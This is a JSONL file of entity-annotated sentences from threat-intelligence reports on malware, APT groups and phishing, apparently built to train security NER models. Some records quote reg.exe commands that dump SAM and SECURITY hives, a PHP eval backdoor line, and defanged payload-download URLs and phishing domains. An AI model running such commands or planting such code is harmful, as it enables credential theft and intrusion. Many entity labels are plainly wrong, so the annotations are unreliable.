1.","entities":[{"id":29964,"label":"tools","start_offset":25,"end_offset":33}],"relations":[],"Comments":[]} {"id":4351,"text":" The lures used in an older campaign from April 2021 impersonated the Federal Board of Revenue.","entities":[{"id":50135,"label":"TIME","start_offset":45,"end_offset":55},{"id":50136,"label":"identity","start_offset":73,"end_offset":97}],"relations":[],"Comments":[]} {"id":8381,"text":"And we don\u2019t just plug security holes \u2013 we work to eliminate entire classes of threats for consumers and businesses whose work depends on the Internet.","entities":[{"id":25803,"label":"location","start_offset":0,"end_offset":3},{"id":25804,"label":"identity","start_offset":13,"end_offset":17},{"id":25805,"label":"location","start_offset":23,"end_offset":31},{"id":25806,"label":"location","start_offset":101,"end_offset":104}],"relations":[],"Comments":[]} {"id":725,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} {"id":13271,"text":"The loader checking the sidebar process Figure 8.","entities":[],"relations":[],"Comments":[]} {"id":13165,"text":"The malware tries to check if the target machine has a USB plug-in and copies the USBferry installer into the USB storage.","entities":[{"id":41084,"label":"location","start_offset":21,"end_offset":26},{"id":41085,"label":"location","start_offset":34,"end_offset":40},{"id":41086,"label":"location","start_offset":67,"end_offset":70},{"id":41087,"label":"malware","start_offset":82,"end_offset":90}],"relations":[],"Comments":[]} {"id":4252,"text":" Figure 8: Calling the decryption function This encouraged us to analyze the string encryption routines thoroughly.","entities":[],"relations":[],"Comments":[]} {"id":13635,"text":"We also recommend that administrators keep the versions of any e-commerce platforms in use by their websites up to date to prevent any potential vulnerabilities, including XSS attacks.","entities":[{"id":51721,"label":"attack-pattern","start_offset":172,"end_offset":183}],"relations":[],"Comments":[]} {"id":5254,"text":"These were signed with the same fake Google certificates.","entities":[],"relations":[],"Comments":[]} {"id":4174,"text":"Configuration decoding function (left: SmileSvr right: Troj_Yahamam) Figure 15. Function used to split different values in configuration file (left: SmileSvr right: Troj_Yahamam)","entities":[{"id":49978,"label":"malware","start_offset":170,"end_offset":182},{"id":49979,"label":"malware","start_offset":154,"end_offset":162},{"id":49980,"label":"malware","start_offset":39,"end_offset":47},{"id":49977,"label":"malware","start_offset":55,"end_offset":67}],"relations":[],"Comments":[]} {"id":3128,"text":"Attackers target home routers like this by targeting default passwords and out-of-date software on the routers.","entities":[{"id":48262,"label":"attack-pattern","start_offset":53,"end_offset":70},{"id":48263,"label":"attack-pattern","start_offset":75,"end_offset":95}],"relations":[],"Comments":[]} {"id":1049,"text":"There is some malware that exploits some vectors outlined in this article, but Palo Alto Networks Unit 42 is not aware of any active attacks against this particular vulnerability at this time.","entities":[{"id":46541,"label":"identity","start_offset":79,"end_offset":105}],"relations":[],"Comments":[]} {"id":2507,"text":"tomcatlogin.jsp","entities":[{"id":47676,"label":"FILEPATH","start_offset":0,"end_offset":15}],"relations":[],"Comments":[]} {"id":4236,"text":"Microsoft Excel document .ppt, .pptx Microsoft Powerpoint presentation .pptx","entities":[],"relations":[],"Comments":[]} {"id":1662,"text":"< Data >","entities":[],"relations":[],"Comments":[]} {"id":5436,"text":"However, in some cases, a device might be an end-of-life product and will no longer receive updates from its vendor.","entities":[],"relations":[],"Comments":[]} {"id":5729,"text":"Simply explained: Figure 1 Conversation Hijacking to Deliver Malware Unit 42 observed this specific attack taking advantage of a vulnerability in Microsoft Office, which has a patch available.","entities":[{"id":17711,"label":"identity","start_offset":148,"end_offset":157}],"relations":[],"Comments":[]} {"id":3417,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A d18d84d32a340d20ab07a36f9e4b959495ecd88d7b0e9799399fcc4e959f536b flash_installer.exe","entities":[{"id":10305,"label":"malware","start_offset":0,"end_offset":11},{"id":10306,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49106,"label":"malware","start_offset":20,"end_offset":44},{"id":49107,"label":"FILEPATH","start_offset":112,"end_offset":131}],"relations":[{"id":709,"from_id":10305,"to_id":49106,"type":"duplicate-of"},{"id":711,"from_id":10306,"to_id":49106,"type":"indicates"},{"id":710,"from_id":49107,"to_id":10306,"type":"duplicate-of"},{"id":712,"from_id":49107,"to_id":49106,"type":"indicates"}],"Comments":[]} {"id":3638,"text":"When he finds one that is still in progress, he crafts a malicious attack email that seems to be relevant to the ongoing email conversation and sends it to Bob as shown in the bottom figure.","entities":[],"relations":[],"Comments":[]} {"id":10530,"text":"We terminated 3 YouTube channels as part of our ongoing investigation into coordinated influence operations linked to Iran.","entities":[],"relations":[],"Comments":[]} {"id":4391,"text":"HYPERSCRAPE won't run unless in a directory with other file dependencies.","entities":[{"id":50204,"label":"malware","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} {"id":13574,"text":"The first way involves appending a fake login form to the page.","entities":[],"relations":[],"Comments":[]} {"id":14149,"text":"Moving to more targeted attack methods appears to be a mainstay among threat actors, which requires organizations to improve their visibility into the entire attack lifecycle.","entities":[],"relations":[],"Comments":[]} {"id":1136,"text":"The evasive nature of this malware family leads to a different file hash, import hash, and only a 20% average SSDeep hash overlap between the samples.","entities":[{"id":46571,"label":"tools","start_offset":110,"end_offset":116}],"relations":[],"Comments":[]} {"id":10033,"text":"As of this writing, our telemetry has detected infection attempts in China.","entities":[],"relations":[],"Comments":[]} {"id":9208,"text":"The JBS cyber attack comes just three weeks after Colonial Pipeline, the US's largest pipeline system, was targeted in a ransomware attack.","entities":[],"relations":[],"Comments":[]} {"id":3295,"text":"3. \u201cnoreturn\u201d: executes a system command using the Python function \u201cwin32api.ShellExecute\u201d without waiting for the result.","entities":[{"id":48383,"label":"SOFTWARE","start_offset":56,"end_offset":62}],"relations":[],"Comments":[]} {"id":3577,"text":"When ConfuserEx performs its obfuscation routine, one of the operations creates a watermark \u2013 a unique identifier within the software--that is present in the final binary.","entities":[{"id":49362,"label":"tools","start_offset":5,"end_offset":15}],"relations":[],"Comments":[]} {"id":13816,"text":"The API hooking on \u201cZwOpenProcess\u201d will only be triggered if \"%temp%\\KERNELBASE.dll\" exists on the host.","entities":[{"id":42857,"label":"attack-pattern","start_offset":8,"end_offset":15},{"id":42858,"label":"location","start_offset":35,"end_offset":39},{"id":42859,"label":"location","start_offset":40,"end_offset":44},{"id":42860,"label":"location","start_offset":99,"end_offset":103}],"relations":[],"Comments":[]} {"id":4621,"text":"RCA Diagrams: Fig. Executing commands using Chopper CnC Conclusion","entities":[],"relations":[],"Comments":[]} {"id":2088,"text":"This threat actor has done little to hide malicious activity, and is probably going to continue this behavior.","entities":[],"relations":[],"Comments":[]} {"id":11470,"text":"Any one government\u2019s ability to meaningfully impact this market is limited; only through a concerted international effort can this serious risk to online safety be mitigated.","entities":[{"id":35061,"label":"location","start_offset":45,"end_offset":51},{"id":35062,"label":"location","start_offset":57,"end_offset":63},{"id":35063,"label":"location","start_offset":76,"end_offset":80},{"id":35064,"label":"location","start_offset":101,"end_offset":114},{"id":35065,"label":"location","start_offset":115,"end_offset":121},{"id":35066,"label":"location","start_offset":122,"end_offset":125},{"id":35067,"label":"tools","start_offset":154,"end_offset":160}],"relations":[],"Comments":[]} {"id":14132,"text":"No months are plotted, so this figure is like compressing all the activity across the full 2020-year in one day just to show the active hours in a day.","entities":[{"id":48195,"label":"TIME","start_offset":91,"end_offset":100}],"relations":[],"Comments":[]} {"id":13309,"text":"The vulnerabilities that Tropic Trooper\u2019s campaigns have been patched last January, for instance.","entities":[],"relations":[],"Comments":[]} {"id":11582,"text":"It contains a generic privilege escalation exploit wrapper which is used by six different exploits.","entities":[{"id":35519,"label":"attack-pattern","start_offset":22,"end_offset":42}],"relations":[],"Comments":[]} {"id":3304,"text":"Depending on the different argument \u201ctype\u201d delivered with the command, it performs different behaviors.","entities":[],"relations":[],"Comments":[]} {"id":2013,"text":"For example, LockBit 2.0 leverages Tox Chat for threat actor communications.","entities":[{"id":45221,"label":"malware","start_offset":13,"end_offset":24},{"id":45222,"label":"tools","start_offset":35,"end_offset":43}],"relations":[{"id":89,"from_id":45221,"to_id":45222,"type":"uses"}],"Comments":[]} {"id":5281,"text":"This report discusses the technical capabilities of this Cyclops Blink malware variant and includes a list of more than 150 current and historical command-and-control (C&C) servers of the Cyclops Blink botnet.","entities":[{"id":51328,"label":"malware","start_offset":57,"end_offset":70},{"id":51329,"label":"malware","start_offset":188,"end_offset":201}],"relations":[],"Comments":[]} {"id":4195,"text":"Signed Binary Proxy Execution: Rundll32 T1036.005","entities":[{"id":49999,"label":"attack-pattern","start_offset":0,"end_offset":49}],"relations":[],"Comments":[]} {"id":1772,"text":"The three vulnerabilities each contain code to alter a user-controlled address, and the code can be distilled down to the following operations:","entities":[],"relations":[],"Comments":[]} {"id":3003,"text":"It\u2019s the apps you use to view content.","entities":[],"relations":[],"Comments":[]} {"id":8005,"text":"Open source malware like Sorano and AdamantiumThief were also observed.","entities":[{"id":24834,"label":"attack-pattern","start_offset":5,"end_offset":11},{"id":24836,"label":"location","start_offset":32,"end_offset":35}],"relations":[],"Comments":[]} {"id":10475,"text":" We did not capture the subsequent stages, but assess the attackers did not have exploits for the current version of Chrome (91.0.4472) at that time, but instead used n-day exploits targeting Samsung Browser, which was running an older and vulnerable version of Chromium.","entities":[{"id":31852,"label":"location","start_offset":144,"end_offset":148},{"id":31854,"label":"location","start_offset":236,"end_offset":239},{"id":31855,"label":"threat-actor","start_offset":262,"end_offset":270}],"relations":[],"Comments":[]} {"id":13984,"text":"In the same way that the kill chain has become an outdated concept, so has the notion that EDR is sufficient to speed up detection and response by solely using the endpoint.","entities":[{"id":48774,"label":"SOFTWARE","start_offset":91,"end_offset":95}],"relations":[],"Comments":[]} {"id":13618,"text":"Figure 14.","entities":[],"relations":[],"Comments":[]} {"id":13676,"text":"X-Mailer: CommuniGate Pro WebUser v5.3.2","entities":[],"relations":[],"Comments":[]} {"id":10197,"text":"The following screenshot is an example of a fake page where the original URL is replaced with one leading to a cookie theft malware download.","entities":[{"id":31138,"label":"tools","start_offset":49,"end_offset":53},{"id":31139,"label":"location","start_offset":94,"end_offset":97}],"relations":[],"Comments":[]} {"id":7678,"text":"Just like in previous operations, they continue to make small changes, such as targeting other countries, entities, or the combination of techniques used for deployment, for each campaign.","entities":[{"id":23878,"label":"identity","start_offset":0,"end_offset":4},{"id":23879,"label":"location","start_offset":56,"end_offset":61},{"id":23880,"label":"location","start_offset":179,"end_offset":187}],"relations":[],"Comments":[]} {"id":728,"text":"OMI is used by Microsoft Azure to manage UNIX packages within Azure virtual machines (VMs), containers and serverless cloud instances.","entities":[{"id":46302,"label":"SOFTWARE","start_offset":0,"end_offset":3},{"id":46305,"label":"SOFTWARE","start_offset":62,"end_offset":90},{"id":46303,"label":"SOFTWARE","start_offset":15,"end_offset":30},{"id":46304,"label":"SOFTWARE","start_offset":41,"end_offset":45}],"relations":[],"Comments":[]} {"id":9643,"text":" Figure 5. Hardcoded RSA256 key showing the first 20 characters","entities":[],"relations":[],"Comments":[]} {"id":2785,"text":"The attacker steals the victims computing resources and translates it into a cryptocurrency like Bitcoin.","entities":[{"id":48011,"label":"SOFTWARE","start_offset":97,"end_offset":104}],"relations":[],"Comments":[]} {"id":7737,"text":"Meanwhile, the .DOC VBA macros retrieves the MSI files from hxxp:\/\/195.123.245.185\/km or hxxp:\/\/185.225.17.5\/km, which executes the NSIS installer for ServHelper installation.","entities":[{"id":24031,"label":"malware","start_offset":132,"end_offset":136},{"id":24032,"label":"tools","start_offset":151,"end_offset":161}],"relations":[],"Comments":[]} {"id":21,"text":"Attacks aren't getting any less sophisticated, so it is time to leave legacy security solutions behind and upgrade to real, prevention-based security.","entities":[],"relations":[],"Comments":[]} {"id":10579,"text":"APP provides the strongest protections available against phishing and account hijacking and is specifically designed for the highest-risk accounts.","entities":[{"id":32265,"label":"attack-pattern","start_offset":57,"end_offset":65},{"id":32266,"label":"location","start_offset":66,"end_offset":69},{"id":32267,"label":"location","start_offset":88,"end_offset":91}],"relations":[],"Comments":[]} {"id":9335,"text":"We first came across the threat in May on the site http:\/\/gooogle[.]press\/, which was advertising a chat app called \u201cChatrious.\u201d","entities":[{"id":28812,"label":"URL","start_offset":51,"end_offset":74},{"id":28813,"label":"location","start_offset":100,"end_offset":104}],"relations":[],"Comments":[]} {"id":3059,"text":"If the user clicks the \u201cUpdate to Full Protection\u201d button they will be prompted to subscribe to a service that costs $4.99 (US) per month through In-App Purchase of Google Play (Figure 3). Figure 3","entities":[],"relations":[],"Comments":[]} {"id":12352,"text":"This targeting is consistent with what others have subsequently reported.","entities":[],"relations":[],"Comments":[]} {"id":10654,"text":"To protect enterprises against malicious activities, we need more than just timely patches.","entities":[{"id":32524,"label":"identity","start_offset":71,"end_offset":75}],"relations":[],"Comments":[]} {"id":5047,"text":"Since our last update, TAG has observed a continuously growing number of threat actors using the war as a lure in phishing and malware campaigns.","entities":[{"id":51131,"label":"identity","start_offset":23,"end_offset":26},{"id":51132,"label":"attack-pattern","start_offset":106,"end_offset":134}],"relations":[],"Comments":[]} {"id":12874,"text":"Lateral Movement: Moving in for the Kill","entities":[],"relations":[],"Comments":[]} {"id":4962,"text":"When a site identified by Safe Browsing as harmful appears in Google Search results, we show a warning next to it in the results.","entities":[{"id":50984,"label":"SOFTWARE","start_offset":62,"end_offset":75},{"id":50985,"label":"SOFTWARE","start_offset":26,"end_offset":39}],"relations":[],"Comments":[]} {"id":102,"text":"They have focused most of their efforts on planting crypto-mining malware on cloud servers in an effort to mine Monero coins, but we have also seen them utilize DDoS IRC bots, steal cloud account credentials, and exfil data.","entities":[{"id":44594,"label":"SOFTWARE","start_offset":112,"end_offset":118},{"id":44595,"label":"attack-pattern","start_offset":161,"end_offset":165},{"id":44596,"label":"attack-pattern","start_offset":176,"end_offset":207},{"id":44597,"label":"attack-pattern","start_offset":213,"end_offset":223},{"id":44598,"label":"malware","start_offset":52,"end_offset":73}],"relations":[],"Comments":[]} {"id":14028,"text":"The image (Figure 3) taken from an analysis of Freenki shows that the same logic applies when the resource is compiled into the binary.","entities":[{"id":47194,"label":"malware","start_offset":47,"end_offset":55}],"relations":[],"Comments":[]} {"id":354,"text":"TrustedSec reports on how attackers were apparently able to glean user credentials from a certain device via the Heartbleed vulnerability and use them to log in via a VPN.","entities":[{"id":44711,"label":"identity","start_offset":0,"end_offset":10},{"id":44712,"label":"vulnerability","start_offset":113,"end_offset":137},{"id":44713,"label":"tools","start_offset":167,"end_offset":170},{"id":44714,"label":"attack-pattern","start_offset":60,"end_offset":82}],"relations":[{"id":18,"from_id":44714,"to_id":44712,"type":"exploits"}],"Comments":[]} {"id":1010,"text":"Accounts for big universities (e.g., MIT, Stanford, etc.) are mainly used to access respective library services and resources, \"including research help, study spaces, print and electronic books\/journals and more.\"","entities":[{"id":46511,"label":"identity","start_offset":42,"end_offset":50},{"id":46510,"label":"identity","start_offset":37,"end_offset":40}],"relations":[],"Comments":[]} {"id":511,"text":"Figure 1 shows the proportion of ransomware sample numbers for different families that Unit 42 detected in the wild.","entities":[{"id":46142,"label":"identity","start_offset":87,"end_offset":94}],"relations":[],"Comments":[]} {"id":2845,"text":" The WanaCrypt0r ransomware spreads itself by heavily scanning over TCP port 445 (associated with SMB) and attempting to exploit the ETERNALBLUE vulnerability on systems.","entities":[{"id":48049,"label":"malware","start_offset":5,"end_offset":16},{"id":8683,"label":"vulnerability","start_offset":133,"end_offset":144}],"relations":[{"id":381,"from_id":48049,"to_id":8683,"type":"exploits"}],"Comments":[]} {"id":12585,"text":"The payload seems to be a product of extensive software engineering.","entities":[],"relations":[],"Comments":[]} {"id":2052,"text":"Many of these also use the x4k name in the domain.","entities":[{"id":45235,"label":"threat-actor","start_offset":27,"end_offset":30}],"relations":[],"Comments":[]} {"id":4141,"text":"The group dumps credentials stored in registries by using reg.exe: reg.exe save hklm\\sam C:\\Users\\Public\\Downloads\\sam.hive reg.exe save hklm\\sam c:\\windows\\temp\\sa.dit reg.exe save hklm\\security c:\\windows\\temp\\se.dit reg.exe save hklm\\system c:\\windows\\temp\\sy.dit","entities":[{"id":49940,"label":"FILEPATH","start_offset":146,"end_offset":168},{"id":49941,"label":"FILEPATH","start_offset":169,"end_offset":176},{"id":49944,"label":"FILEPATH","start_offset":219,"end_offset":226},{"id":49947,"label":"FILEPATH","start_offset":67,"end_offset":74},{"id":49939,"label":"REGISTRYKEY","start_offset":137,"end_offset":145},{"id":49942,"label":"REGISTRYKEY","start_offset":182,"end_offset":195},{"id":49943,"label":"FILEPATH","start_offset":196,"end_offset":218},{"id":49945,"label":"REGISTRYKEY","start_offset":232,"end_offset":243},{"id":49946,"label":"FILEPATH","start_offset":244,"end_offset":266},{"id":49948,"label":"REGISTRYKEY","start_offset":80,"end_offset":88},{"id":49949,"label":"FILEPATH","start_offset":89,"end_offset":123},{"id":49950,"label":"FILEPATH","start_offset":124,"end_offset":131}],"relations":[],"Comments":[]} {"id":7164,"text":"Updated June 18, 2018, 10:05 AM to add new IoC information from IssueMakersLab's July investigation.","entities":[{"id":22406,"label":"TIME","start_offset":23,"end_offset":31}],"relations":[],"Comments":[]} {"id":4562,"text":"Based on our analysis, we believe that the StopWar app was developed by pro-Ukrainian developers and was the inspiration for what Turla actors based their fake CyberAzov DoS app off of.","entities":[{"id":50379,"label":"malware","start_offset":43,"end_offset":54},{"id":50380,"label":"threat-actor","start_offset":130,"end_offset":142},{"id":50381,"label":"malware","start_offset":160,"end_offset":177}],"relations":[{"id":951,"from_id":50381,"to_id":50380,"type":"authored-by"}],"Comments":[]} {"id":4986,"text":"More technical details about this vulnerability are available in this RCA by Maddie Stone.","entities":[{"id":51045,"label":"identity","start_offset":77,"end_offset":89}],"relations":[],"Comments":[]} {"id":1651,"text":"Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":3194,"text":"The fake Adobe Flash Player download page of the watering hole attack Figure 5.","entities":[{"id":48321,"label":"attack-pattern","start_offset":49,"end_offset":69},{"id":48320,"label":"SOFTWARE","start_offset":9,"end_offset":27}],"relations":[],"Comments":[]} {"id":1294,"text":" The malware then attempts to read the following file.","entities":[],"relations":[],"Comments":[]} {"id":4943,"text":"One of the most notable characteristics of APT35 is their impersonation of conference officials to conduct phishing attacks.","entities":[{"id":50967,"label":"threat-actor","start_offset":43,"end_offset":48},{"id":50968,"label":"attack-pattern","start_offset":107,"end_offset":115}],"relations":[],"Comments":[]} {"id":12299,"text":"We terminated 2 YouTube channels as part of our ongoing investigation into a coordinated influence operation linked to Iran.","entities":[],"relations":[],"Comments":[]} {"id":3381,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 2b580af1cdc4655ae75ef503aba7600e05cdd68b056a9354a2184b7fbb24db6f Silverlight_ins.exe ","entities":[{"id":10226,"label":"malware","start_offset":0,"end_offset":11},{"id":10227,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49029,"label":"malware","start_offset":20,"end_offset":44},{"id":49030,"label":"FILEPATH","start_offset":112,"end_offset":131}],"relations":[{"id":570,"from_id":10226,"to_id":49029,"type":"duplicate-of"},{"id":571,"from_id":10227,"to_id":49029,"type":"indicates"},{"id":572,"from_id":49030,"to_id":49029,"type":"indicates"},{"id":573,"from_id":49030,"to_id":10227,"type":"duplicate-of"}],"Comments":[]} {"id":7113,"text":"The Iron Tiger APT group has used the HyperBro malware family since at least 2017.","entities":[{"id":22266,"label":"malware","start_offset":38,"end_offset":46}],"relations":[],"Comments":[]} {"id":12087,"text":"Phishing Domains: nco2[.]live summit-files[.]com filetransfer[.]club continuetogo[.]me accessverification[.]online customers-verification-identifier[.]site service-activity-session[.]online identifier-service-review[.]site recovery-activity-identification[.]site review-session-confirmation[.]site recovery-service-activity[.]site verify-service-activity[.]site service-manager-notifications[.]info ","entities":[{"id":37425,"label":"attack-pattern","start_offset":0,"end_offset":8},{"id":37426,"label":"location","start_offset":30,"end_offset":36}],"relations":[],"Comments":[]} {"id":14394,"text":"XDR is intended to be that security data lake of deeper enterprise infrastructure and security information than we\u2019ve previously gathered in a single addressable pool and designed to be useful for threat hunters and analysts.","entities":[{"id":51776,"label":"SOFTWARE","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} {"id":2865,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":455,"text":"Fortunately, there are emerging technologies now that can better counter DGAs.","entities":[],"relations":[],"Comments":[]} {"id":2604,"text":"In other cases, for example that of Microsoft, there was simply publication without extortion, again supporting the understanding that the primary motivation of this actor is notoriety rather than financial gain.","entities":[{"id":45615,"label":"identity","start_offset":36,"end_offset":45}],"relations":[],"Comments":[]} {"id":13447,"text":"Within these files is a link to an attacker controlled phishing domain.","entities":[{"id":41867,"label":"attack-pattern","start_offset":55,"end_offset":63}],"relations":[],"Comments":[]} {"id":10247,"text":"In 2020, Pawn Storm often tries to obfuscate these brute force attempts by routing their attack traffic over Tor and VPN servers.","entities":[{"id":31314,"label":"attack-pattern","start_offset":51,"end_offset":62},{"id":31315,"label":"malware","start_offset":109,"end_offset":112},{"id":31316,"label":"location","start_offset":113,"end_offset":116}],"relations":[],"Comments":[]} {"id":12437,"text":"Host IOCs Registry Keys HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\KernelConfig HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\DriverConfig HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\SSL Update File Paths C:\\Windows\\System32\\Nwsapagent.sys C:\\Windows\\System32\\helpsvc.sys C:\\ProgramData\\USOShared\\uso.bin C:\\ProgramData\\VMware\\vmnat-update.bin C:\\ProgramData\\VirtualBox\\update.bin","entities":[{"id":38657,"label":"location","start_offset":0,"end_offset":4},{"id":38658,"label":"REGISTRYKEY","start_offset":24,"end_offset":83},{"id":38659,"label":"REGISTRYKEY","start_offset":84,"end_offset":143},{"id":38660,"label":"REGISTRYKEY","start_offset":144,"end_offset":198}],"relations":[],"Comments":[]} {"id":3131,"text":"If you\u2019re not sure how to do this, contact your Internet Service Provider (ISP) that gave you the router for help.","entities":[],"relations":[],"Comments":[]} {"id":13591,"text":"First, the $IDFX variable uses XOR operation (see character ^) to decode the string \u201ccreate_function\u201d, then the resulting base64 string is decoded to @eval($_REQUEST['ec_ver2update']); which is the backdoor\u2019s code.","entities":[],"relations":[],"Comments":[]} {"id":5551,"text":"However, as we\u2019ve seen, Magecart has hit big-name brands as well as less well-known companies.","entities":[{"id":51540,"label":"malware","start_offset":24,"end_offset":32}],"relations":[],"Comments":[]} {"id":4873,"text":"In 2014, Microsoft filed a civil suit against the developer, Mohammed Benabdellah, for the development and dissemination of H-Worm.","entities":[{"id":50875,"label":"TIME","start_offset":3,"end_offset":7},{"id":50877,"label":"identity","start_offset":61,"end_offset":81},{"id":50878,"label":"malware","start_offset":124,"end_offset":130},{"id":50876,"label":"identity","start_offset":9,"end_offset":18}],"relations":[{"id":1029,"from_id":50878,"to_id":50877,"type":"authored-by"}],"Comments":[]} {"id":14296,"text":"Maikspy on the Windows platform Figure 7.","entities":[{"id":48501,"label":"malware","start_offset":0,"end_offset":8},{"id":48502,"label":"SOFTWARE","start_offset":15,"end_offset":23}],"relations":[{"id":433,"from_id":48501,"to_id":48502,"type":"targets"}],"Comments":[]} {"id":3953,"text":"In addition, a publicly available JoeWare domain tool called LG.exe, which is quite popular among attackers and domain admins alike, was installed and used in the attack.","entities":[{"id":49805,"label":"FILEPATH","start_offset":61,"end_offset":67},{"id":49806,"label":"tools","start_offset":34,"end_offset":53}],"relations":[],"Comments":[]} {"id":1848,"text":" Figure 20. 0x9988C094 in a switch case with sub_14001DC80 (above), with the latter value terminating a process (below).","entities":[],"relations":[],"Comments":[]} {"id":9636,"text":"theme0.xml is extracted to \/tmp\/system\/word\/theme\/syslogd before it\u2019s executed.","entities":[],"relations":[],"Comments":[]} {"id":10617,"text":"In the simple phishing example below, an attacker has sent a phishing email with a security alert lure from \u201cGoolge\u201d suggesting the user secure their account.","entities":[{"id":32385,"label":"attack-pattern","start_offset":14,"end_offset":22},{"id":32386,"label":"attack-pattern","start_offset":61,"end_offset":69},{"id":32387,"label":"location","start_offset":83,"end_offset":91},{"id":32388,"label":"location","start_offset":92,"end_offset":97},{"id":32389,"label":"location","start_offset":98,"end_offset":102}],"relations":[],"Comments":[]} {"id":210,"text":" Further analysis has confirmed that the malware accepts command-line arguments allowing an attacker to instruct the malware to sleep for a period of time or to shut down the system.","entities":[],"relations":[],"Comments":[]} {"id":6959,"text":"ObliqueRat attack chain ","entities":[{"id":21788,"label":"malware","start_offset":0,"end_offset":10}],"relations":[],"Comments":[]} {"id":3624,"text":" A good example of a generalized phishing campaign is the Blank Slate Campaign we wrote about in March 2017.","entities":[{"id":49409,"label":"campaign","start_offset":58,"end_offset":78},{"id":49410,"label":"TIME","start_offset":97,"end_offset":107},{"id":49408,"label":"attack-pattern","start_offset":33,"end_offset":50}],"relations":[{"id":793,"from_id":49409,"to_id":49408,"type":"uses"}],"Comments":[]} {"id":1631,"text":" Each of these applications is designed to appear like a legitimate application already in the app store.","entities":[],"relations":[],"Comments":[]} {"id":10409,"text":"Further research uncovered other dropped files involved in this attack.","entities":[],"relations":[],"Comments":[]} {"id":8191,"text":"A perceptive employee could potentially identify this as something unusual, which raises red flags.","entities":[],"relations":[],"Comments":[]} {"id":50,"text":"Put another way, the ransomware model represented both increased efficiency and decreased risk in monetizing the infection.","entities":[],"relations":[],"Comments":[]} {"id":2927,"text":"The attackers are doing this by using URL shorteners to make XMRig look like other, legitimate, and expected programs.","entities":[{"id":48098,"label":"tools","start_offset":60,"end_offset":66}],"relations":[],"Comments":[]} {"id":2816,"text":" Reports quickly emerged that this attack was effective due to the presence of code exploiting a vulnerability (CVE-2017-0144) in Microsoft Windows (code named: ETERNALBLUE) that was released as part of the Equation Group dump by the Shadow Brokers in their fifth leak on April 14, 2017.","entities":[{"id":48034,"label":"SOFTWARE","start_offset":130,"end_offset":147},{"id":48035,"label":"TIME","start_offset":272,"end_offset":286},{"id":48033,"label":"vulnerability","start_offset":112,"end_offset":125},{"id":8600,"label":"vulnerability","start_offset":161,"end_offset":172},{"id":8601,"label":"threat-actor","start_offset":207,"end_offset":221},{"id":8602,"label":"threat-actor","start_offset":230,"end_offset":248}],"relations":[{"id":377,"from_id":48034,"to_id":48033,"type":"has"},{"id":378,"from_id":8600,"to_id":48033,"type":"related-to"},{"id":379,"from_id":8600,"to_id":8601,"type":"related-to"}],"Comments":[]} {"id":9052,"text":"RATANKBA main console interface","entities":[{"id":27959,"label":"tools","start_offset":0,"end_offset":8}],"relations":[],"Comments":[]} {"id":2279,"text":"These services include selling access to virtual machines loaded with stolen credentials (dont[.]farm), proxy access (awmproxy), and selling credit card numbers (extracard) to be used for other malicious activities such as serving malicious ads and payment fraud on Google Ads.","entities":[{"id":47349,"label":"DOMAIN","start_offset":90,"end_offset":101},{"id":47350,"label":"SOFTWARE","start_offset":266,"end_offset":276}],"relations":[],"Comments":[]} {"id":5802,"text":"And cyberspace is just one of them now, but we're getting into this unique area which we anticipated\u2026could cyber conflict be the main domain that is being acted upon?","entities":[{"id":17948,"label":"location","start_offset":0,"end_offset":3},{"id":17949,"label":"identity","start_offset":18,"end_offset":22},{"id":17951,"label":"location","start_offset":30,"end_offset":34}],"relations":[],"Comments":[]} {"id":2489,"text":"Since exploitation is straightforward and all the relevant technical details have already gone viral on the internet, it\u2019s possible that SpringShell will become fully weaponized and abused on a larger scale.","entities":[{"id":47572,"label":"vulnerability","start_offset":137,"end_offset":148}],"relations":[],"Comments":[]} {"id":10091,"text":"Supernova, one of the malicious components associated with the attack, is a .NET web shell backdoor that presents itself as a legitimate SolarWinds web service handler.","entities":[{"id":30777,"label":"tools","start_offset":0,"end_offset":9},{"id":30778,"label":"location","start_offset":11,"end_offset":14},{"id":30779,"label":"attack-pattern","start_offset":81,"end_offset":90},{"id":30780,"label":"identity","start_offset":137,"end_offset":147},{"id":30781,"label":"attack-pattern","start_offset":148,"end_offset":159}],"relations":[],"Comments":[]} {"id":2198,"text":"This check exists in a number of the subsequent processes\/executables used by the TDrop2 malware variant.","entities":[{"id":6600,"label":"malware","start_offset":82,"end_offset":88}],"relations":[],"Comments":[]} {"id":258,"text":"For example, we detected a website that was distributing a malicious binary by masquerading as a popular global communication app targeting users in Ukraine.","entities":[{"id":847,"label":"attack-pattern","start_offset":79,"end_offset":91},{"id":44662,"label":"location","start_offset":149,"end_offset":156},{"id":44663,"label":"attack-pattern","start_offset":44,"end_offset":75}],"relations":[],"Comments":[]} {"id":5118,"text":"[00:59] It makes for interesting cinema, just like the red code\/green code in CSI Cyber, but it's not a reflection of reality and that's a real challenge.","entities":[],"relations":[],"Comments":[]} {"id":4122,"text":"Checks environment information 0x500E Unknown","entities":[],"relations":[],"Comments":[]} {"id":8149,"text":"In addition, a URL linking to one of the apps\u2019 Google Play pages is also found on one of the C&C servers.","entities":[],"relations":[],"Comments":[]} {"id":12619,"text":"Before it encrypts any file, the ransomware also performs certain preparatory routines.","entities":[],"relations":[],"Comments":[]} {"id":3321,"text":"These database files are used for saving the chat history.","entities":[],"relations":[],"Comments":[]} {"id":2200,"text":"Once extracted, the file writes it to a new file on disk prior to executing it.","entities":[],"relations":[],"Comments":[]} {"id":3973,"text":"A consolidated view of all security sensors provides a single-pane-of-glass view that will promote quick and thorough investigation and response.","entities":[],"relations":[],"Comments":[]} {"id":12086,"text":"Indicators from APT28 phishing campaign: service-reset-password-moderate-digital.rf[.]gd reset-service-identity-mail.42web[.]io digital-email-software.great-site[.]net Indicators from APT35 campaigns: Abused Google Properties: https:\/\/sites.google[.]com\/view\/ty85yt8tg8-download-rtih4ithr\/ https:\/\/sites.google[.]com\/view\/user-id-568245\/ 